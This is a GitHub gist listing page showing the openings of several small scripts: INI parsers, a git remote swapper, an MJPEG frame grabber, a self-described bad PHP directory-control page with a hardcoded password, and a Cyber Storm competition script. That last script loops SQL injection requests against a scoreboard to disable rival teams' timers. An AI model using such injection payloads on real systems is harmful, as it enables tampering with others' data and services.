Skip to content

Instantly share code, notes, and snippets.

View ExploitSage's full-sized avatar

Mykah ExploitSage

31 followers · 57 following
View GitHub Profile
@ExploitSage
ExploitSage / ini_parser.sh
Created February 5, 2020 15:31
function parse_ini() {
local varname="${1}"
local ini_source=$(cat -)
declare -gA "${varname}"
local IFS_BAK="${IFS}";
IFS=$'\n';
for section in $(echo "${ini_source}" | grep -Po '(?<=\[).*(?=\])'); do
for option_value in $(echo "${ini_source}" | grep -Pazo "(?s)(?<=\[${section}\])(.*?)(?=\[|$)" | tr -d '\000' | grep "="); do
option="$(echo "${option_value}" | cut -d "=" -f 1)";
@ExploitSage
ExploitSage / githubremoteswap.sh
Last active March 27, 2018 04:28
Shell Script to swap the GitHub remote of origin or supplied remote url to ssh supplied form ssh or https.
#!/bin/bash
regex="(https:\/\/|git@)github.com(\/|:)(.+)\/(.+).git"
remote="origin"
result="https"
if [ ! -z "$1" ]; then
if [ "$1" == "https" -o "$1" == "ssh" ]; then
result="$1"
@ExploitSage
ExploitSage / INIParser.groovy
Last active March 27, 2018 19:08
Groovy INI Parser Class utilizing Regex and an Internal Map.
class INIParser {
def structure = [:]
def INIParser(iniString) {
parse(iniString);
}
def parse(iniSource) {
structure = [:];
iniSource.findAll(~/(?s)\[(.+?)\]\s*(.*?)\s*(?=\[|$)/) { match, section, items ->
@ExploitSage
ExploitSage / frame_grab.sh
Created March 14, 2018 13:48
Grab the current frame from an MJPG/MJPEG Stream and save as a PNG Image
#!/bin/bash
NOW=$(TZ='America/Chicago' date +%Y-%m-%d_%H%M)
FILENAME=/path/to/directory/image_$NOW.png
STREAMURL=http://127.0.0.1:6000/video.mjpg
ffmpeg -i "$STREAMURL" -f image2 -vframes 1 "$FILENAME"
convert "$FILENAME" -gravity SouthEast -pointsize 22 -fill white -annotate +10+10 "$NOW" "$FILENAME"
@ExploitSage
ExploitSage / BadDirectoryControl.php
Last active June 11, 2020 23:20
Bad Directory Listing Control Page for those who don't want to allow direct directory listings. Only thing worse would be a client side JavaScript version.
<?php
$username = ""; //Empty String Disables Username
$password = "BADPASSWORDHERE";
$directory = "./";
$remove = ["index.php",".index.swp",".index.php.swp"];
function get_directory_listing($directory = array(),$remove = array())
{
if(file_exists($directory))
{
@ExploitSage
ExploitSage / Fight4ThePi.sh
Created May 26, 2016 02:07
Simple Bash Script written for the 2015 Cyber Storm competition at Louisiana Tech. Script utilized SQL injection to disable timers for all teams except Team Forge and do so on loop in order to ensure Team Forge's Victory.
#!/bin/bash
while true; do
curl --data "TeamName=forge';#&Enabled=1&Submit=Submit+Query" http://10.168.230.52/submit.php
curl --data "TeamName=blue beetle';#&Enabled=NULL&Submit=Submit+Query" http://10.168.230.52/submit.php
curl --data "TeamName=cyborg';#&Enabled=NULL&Submit=Submit+Query" http://10.168.230.52/submit.php
curl --data "TeamName=red tornado';#&Enabled=NULL&Submit=Submit+Query" http://10.168.230.52/submit.php
curl --data "TeamName=vision';#&Enabled=NULL&Submit=Submit+Query" http://10.168.230.52/submit.php
# curl --data "TeamName=ulton';#&Enabled=NULL&Submit=Submit+Query" http://10.168.230.52/submit.php
sleep 2